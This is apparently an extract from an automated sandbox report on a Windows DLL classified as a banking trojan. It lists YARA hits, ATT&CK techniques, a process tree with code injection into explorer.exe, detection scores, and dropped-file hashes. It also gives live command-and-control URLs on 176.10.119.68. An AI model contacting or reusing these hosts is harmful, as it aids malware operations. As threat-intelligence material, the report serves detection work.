                      Source: Yara match; File source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara match; File source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match; File sources: the same memory dumps, process memory spaces and unpacked PE files listed under Stealing of Sensitive Information above.
                      MITRE ATT&CK matrix (techniques with at least one matched signature; the number in parentheses is the count shown in the report's cell)

                      Initial Access: Valid Accounts (1)
                      Execution: Windows Management Instrumentation (1); Native API (3); Command and Scripting Interpreter (1)
                      Persistence: Valid Accounts (1)
                      Privilege Escalation: Valid Accounts (1); Access Token Manipulation (1); Process Injection (813)
                      Defense Evasion: Obfuscated Files or Information (1); File Deletion (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (31); Process Injection (813); Rundll32 (1)
                      Credential Access: no matched technique
                      Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (25); Security Software Discovery (11); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
                      Lateral Movement: no matched technique
                      Collection: Archive Collected Data (11); Email Collection (1)
                      Exfiltration: no matched technique
                      Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (11)
                      Network Effects: no matched technique
                      Remote Service Effects: no matched technique
                      Impact: Data Encrypted for Impact (1)
                      Behavior Graph ID: 634419; Sample: lokvQRcUe0; Start date: 26/05/2022; Architecture: WINDOWS; Score: 100
                      Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Antivirus detection for URL or domain; 3 other signatures

                      Process tree (from the behavior graph):
                      loaddll32.exe
                        cmd.exe
                          rundll32.exe
                            network: 176.10.119.68:80 (local port 49752), AS-SOFTPLUSCH, Switzerland
                            signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                            control.exe
                              signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
                        WerFault.exe
                        WerFault.exe
                        WerFault.exe
                      mshta.exe
                        powershell.exe
                          signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
                          explorer.exe (injected)
                            signatures: Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); 2 other signatures
                            cmd.exe
                              conhost.exe
                          csc.exe
                            dropped: C:\Users\user\AppData\Local\...\b5khtopv.dll, PE32
                            cvtres.exe
                          csc.exe
                            dropped: C:\Users\user\AppData\Local\...\kikzslfg.dll, PE32
                            cvtres.exe
                          conhost.exe

                      Source | Detection | Scanner | Label
                      lokvQRcUe0.dll | 49% | ReversingLabs | Win32.Trojan.Lazy
                      lokvQRcUe0.dll | 100% | Joe Sandbox ML |
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      2.2.rundll32.exe.4a10000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/ | 100% | Avira URL Cloud | phishing
                      http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk | 100% | Avira URL Cloud | phishing
                      http://schemas.mi | 0% | URL Reputation | safe
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZ | 100% | Avira URL Cloud | phishing
                      http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
                      http://schemas.micr | 0% | URL Reputation | safe
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk | 100% | Avira URL Cloud | phishing
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk | 100% | Avira URL Cloud | phishing
                      http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ | 100% | Avira URL Cloud | phishing
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk | true | Avira URL Cloud: phishing | unknown
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk | true | Avira URL Cloud: phishing | unknown
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk | true | Avira URL Cloud: phishing | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/ | rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
                      http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                      http://schemas.mi | explorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZ | rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
                      http://constitution.org/usdeclar.txt | rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://schemas.micr | explorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ | rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      176.10.119.68 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:634419
                      Start date and time: 26/05/2022 04:05:06 (2022-05-26 04:05:06 +02:00)
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 20s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:lokvQRcUe0 (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of new started processes analysed:45
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@27/28@0/1
                      EGA Information:
                      • Successful, ratio: 75%
                      HDC Information:
                      • Successful, ratio: 23.4% (good quality ratio 21.2%)
                      • Quality average: 78.1%
                      • Quality standard deviation: 32.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 143
                      • Number of non-executed functions: 210
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.42.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6356 because there are no executed functions
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      Time | Type | Description
                      04:06:17 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
                      04:07:05 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                      04:07:51 | API Interceptor | 1x Sleep call for process: control.exe modified
                      Match | Associated Sample Name / URL | Detection
                      176.10.119.68 | zs5n5sI6N2.dll | malicious
                      176.10.119.68 | 628df1368bdb5.dll | malicious
                          No context
                          Match | Associated Sample Name / URL | Detection | Context
                          AS-SOFTPLUSCH | zs5n5sI6N2.dll | malicious | 176.10.119.68
                          AS-SOFTPLUSCH | 628df1368bdb5.dll | malicious | 176.10.119.68
                          AS-SOFTPLUSCH | PE ID & DLT TEMPLATE.exe | malicious | 91.192.100.5
                          AS-SOFTPLUSCH | Payment Slip 01.exe | malicious | 91.192.100.5
                          AS-SOFTPLUSCH | bank_payment-doc.exe | malicious | 91.192.102.107
                          AS-SOFTPLUSCH | BJp3aUvrt9.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | 62835e34e60c1.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | 62835e34e60c1.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | P5ASinnD4i.exe | malicious | 176.10.119.117
                          AS-SOFTPLUSCH | 5A30ie6lsZ.exe | malicious | 176.10.119.117
                          AS-SOFTPLUSCH | OIpCcXM6Y5.exe | malicious | 176.10.119.117
                          AS-SOFTPLUSCH | xaj0e933Uv.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | tIJVb0BvkI.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | XoVzWJQAQ0.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | qOfIxt1fnQ.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | 2oCOO5LbPu.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | rXN8OIpbzz.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | GlJdt15gDI.dll | malicious | 185.189.151.28
                          AS-SOFTPLUSCH | o52M6ZqBFp | malicious | 176.10.116.173
                          AS-SOFTPLUSCH | com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apk | malicious | 176.10.119.156
                          No context
                          No context
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.7489367348203112
                          Encrypted:false
                          SSDEEP:96:DvF+1InYyGy9haot7JnOpXIQcQac6pcEccw35+a+z+HbHgoownOgtYsXqOEX/vF1:jdn+H0tGtjbq/u7sLS274ItW
                          MD5:D5E7A810266C0360B05ABAA90325D05D
                          SHA1:26D18F5B23A1A41BED2465ED47F56D889D45010F
                          SHA-256:BD534CC31EF9CC02A34C0181EE7BD9C6DC12CB6CE93A0A113FF1B837950BCE1B
                          SHA-512:EEE5A73BD400EC913B2C795B18CD7D0DB001FCE986F0B8C20455D0A99BA83FC9137FFAC403B6B063388B7C576564F01707119E683E18C8BC91A6ADEA07A5B9B0
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.7418279470653837
                          Encrypted:false
                          SSDEEP:96:+ClInYyPy9haVCj+ASZpXIQcQac6pcEccw35+a+z+HbHgoownOgtYsXqOEX/vFOp:ynVH0tGtjbq/u7sLS274Itb
                          MD5:3C1FCD749BF12D3B7F2A8EEBF75E74B3
                          SHA1:1B8F8C88D17B723C18848FBDDE88947D746E5879
                          SHA-256:DFC470A575DB0CDD9697D1DBA1B935F0B4B0B5B9E565CE181A8171F29C9CC9BC
                          SHA-512:3B12A45EDCE87B8CF0834DA52756F7A21C280F08E135ED51BE58F29040C3D05EED9C31A680A2611CD8866C20AADC8C5DEDD1FBB1DD5D4662B1C37D1633E2F64B
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.7452135127368718
                          Encrypted:false
                          SSDEEP:96:aFTFydZInYyGy9haVCjmfspXIQcQl8c6npbcE7cw3C+a+z+HbHgoownOgtYsXqO1:apganTH78tbBEjbq/u7swS274ItW
                          MD5:4676BB18681C3F440D8E111849E76E52
                          SHA1:D3D4935FA6C9E4F4C734124509543F11E309B318
                          SHA-256:C95EA7E8ED353FA50E442995B539984CFFC545E9A213680B0343DA40A3656D83
                          SHA-512:7A07D8AF9ADA4514A82A60D29ED48744503049C4BB4648BE24941D5E2DCFFB5F332355BB901E9CE1A3FA3297B6FBA67FB9CA5311AACE78F14B1B3AD66571C90D
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu May 26 11:06:12 2022, 0x1205a4 type
                          Category:dropped
                          Size (bytes):37522
                          Entropy (8bit):1.952483435461223
                          Encrypted:false
                          SSDEEP:96:5J8oq8M/2+Nz+Poi7SfCBFRME2SBaMVIabT5duzDAKqBTsFWInWIBgI4jJTGRc8V:wf2+NZOSFWxphdumXjdGRc8U0fOz
                          MD5:07ABE710E329FCA3C299AFAD1AE79C0E
                          SHA1:10361EDE3FF7B9E104006CC3F462F6D6EAA30AF1
                          SHA-256:1EB35B201DEFCE33CCF6F97DDBABB1756743AAED90DA40913BE6F739B34722E4
                          SHA-512:BD31BDEA614708437CDB80ED706EAAE231110A2030F24E1136D42727E4743EC6450C7C6ECF0386EF9F19F0298B2924E3B555C1A0AD725F9CAD4AC6AE7B77A181
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8346
                          Entropy (8bit):3.6923276777881933
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNiA+6bfucF6YWVSUqF8gmfbSt9CpNj89bEO1fyMm:RrlsNi56aW6YkSUqF8gmfbSFEEf4
                          MD5:32B1D05D43DA3F9AAD3868BEEB87391A
                          SHA1:3C98CEA62445036A6FC570DFC3BEDCAFE965367D
                          SHA-256:5D5FFC18AD55E5082682182FC83ABA21FA70577698258F54337209AA203600D2
                          SHA-512:9268517336F84A7FA1E3AF9DD6831D83A64A05E62B94D670640D5A3FEA8F4A3E4AA33F294590858D5C1B9F48157BCC595B5EAB4524BD215A73088D3D9ED3FAEE
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4659
                          Entropy (8bit):4.424687359057914
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zsuJgtWI9CcWgc8sqYjy8fm8M4J2+4FA+q8vQ+WKcQIcQw0ld:uITfkFVgrsqYjJzKKKkw0ld
                          MD5:13514E4971D5EAF338B2584EC9131379
                          SHA1:7BA320D9BB21969CAFB4DFCC418DBE16A4D2171A
                          SHA-256:5C78050C06F40345D01FE32AFBD71A7573387E87632E16BB9D2402CE82FEEE79
                          SHA-512:8A6FAB012137E08868815004F5014C98C09AF4C60A27C711EA46CF08E1C6B211A63C0AF340D16900270A2D808F4C5EC84B06BEFE2B513B0CFDDC33997C60582C
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu May 26 11:06:15 2022, 0x1205a4 type
                          Category:dropped
                          Size (bytes):37322
                          Entropy (8bit):1.8947302696079928
                          Encrypted:false
                          SSDEEP:96:5C8oi8M/G+5l/1oi7SfCgFR2iBCMelJ5t4uzDAKqBTsFWInWIBgI4jJT9p3LqWct:j3G+DCOSvClPaumXjd9p7qWcODKiPfpY
                          MD5:2BF1A1E91B53E5CD417B1E9239325FD8
                          SHA1:48135C24AEF60723F4DA16198D7BC2F8E96B073C
                          SHA-256:8052C42F618E22A1BEBBD651DCEB232C60F478491F597D2B80F71A408737CAE7
                          SHA-512:453D84AA1DBA1BBDD396516840E3BBC69E69BFB097F5E4802A5A662D8D59F7153190E362D7210C8903A7BD283AF85B02378AD5A37E1163AB62EDF07B2A6F3ED5
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8334
                          Entropy (8bit):3.702395314492602
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNiAL6bf606YWSSUonwgmffSt9Cpru89bbmsfApm:RrlsNi86O06YjSUonwgmffSQbFfT
                          MD5:77967BF18A4A34A14AC3777AA82FD989
                          SHA1:BF228D629051EE5147FB5CCF51AEF9D049A24040
                          SHA-256:23DBFD3DEE2D8567F2FFE2A7C4507AC4E7AF590D58BD6E557EBD77F2FB4018D2
                          SHA-512:14C636839BA38A23A370599C9FCC4587C8F8E4365C9D6314CDB89AEFEC069FBD1AA489102FA05167529ED84CE21F24DDC4D2565F2BE0F1A64907E62AAEE8D7DD
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4598
                          Entropy (8bit):4.47471576307433
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zsuJgtWI9CcWgc8sqYje8fm8M4J2+cZFe+q849BrKcQIcQw0kd:uITfkFVgrsqY3J+C3rKkw0kd
                          MD5:54C03D70B220D32B86E7ADD1E89E9F2E
                          SHA1:E689CB03167A07E8B6B3A9BBA353FBD971149EEE
                          SHA-256:B1E454C2508E67F574BC23B5F9C278333276492C342872A87AC6A55C2E2D96AF
                          SHA-512:6919BC738AB85FE52B1E95CF19ADB11A70FB1867370D553985F57653CF7F9FB32FFF3A77EEEB8B0E52F327C2F65AFBFC5D22CB159CF19F490F9E8AFA0880B644
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu May 26 11:06:20 2022, 0x1205a4 type
                          Category:dropped
                          Size (bytes):50326
                          Entropy (8bit):2.125946543056507
                          Encrypted:false
                          SSDEEP:192:IpH+L4OSAmpgaeTlcrl76oH72ElMckKTA4squIZjdC5PIKHDDEAKkPsy:h/SAmpgaeE5lMckCyquI505Psy
                          MD5:CA250C408A43688CEFB9F3397FA729EB
                          SHA1:8FAE67C648415ED7E61441FBE291B1F08C7D84BE
                          SHA-256:E8DA5CF423A1B30352B81E352EE8DB57725A63D96108646467D25B09E19A5F76
                          SHA-512:24515C4D1D0CF8600A17480087A9C1A32510E15816FD97DB6CB72203EA557E7C23F21E2B8DAAC29AF19894000A6A4E8F621A8651F44CA44494280C363471B44D
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8290
                          Entropy (8bit):3.696150034621855
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNiAH6bef6YWdSU5OqgmfYSZ9CpDl89bFmsf6Xm:RrlsNio6Cf6Y8SU5OqgmfYSZFFfT
                          MD5:E2C283F6E9C9F27B1B6E7F14D88094C9
                          SHA1:680DF4EF66AE32C292A14A8F17BBE7A6A5597DDC
                          SHA-256:6F86ACD2083CFDCD45A58DF4638BD3E640559A18B9ABC8D8C96A4F4CA1B70349
                          SHA-512:B93CB9B980FFB36425E5A71CF7F5D269EF0FC95A319B78D5F3DEEC7BE33BD2B91C515DC7BADCBEF55056AFCDBAA8098F1DF8EEAA14E6E01AE5CCD41375A1D8C6
                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>17134</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>....<Revision>1</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>1033</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6352</Pid>...
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4558
                          Entropy (8bit):4.434078780575867
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zsuJgtWI9CcWgc8sqYjk8fm8M4J2+7F/gh+q84ARKcQIcQw0kd:uITfkFVgrsqYtJnOwKkw0kd
                          MD5:AD092981409016DC61C4616952F5AEE9
                          SHA1:758103A72993DEF8378E720B580EF3C9ACECEB18
                          SHA-256:75207810F0A20613C0A11661346A5546D1A1F6A803969A52A40BB8BBDB1DF012
                          SHA-512:96D960E15081E3AC1503A287CD4FD581A7D43E72056FE946EB84E1744A3698653FD146CD60003C1BBE434D45D1EDD51B21C5FFE2018D876E17C52B918150F91C
                          Malicious:false
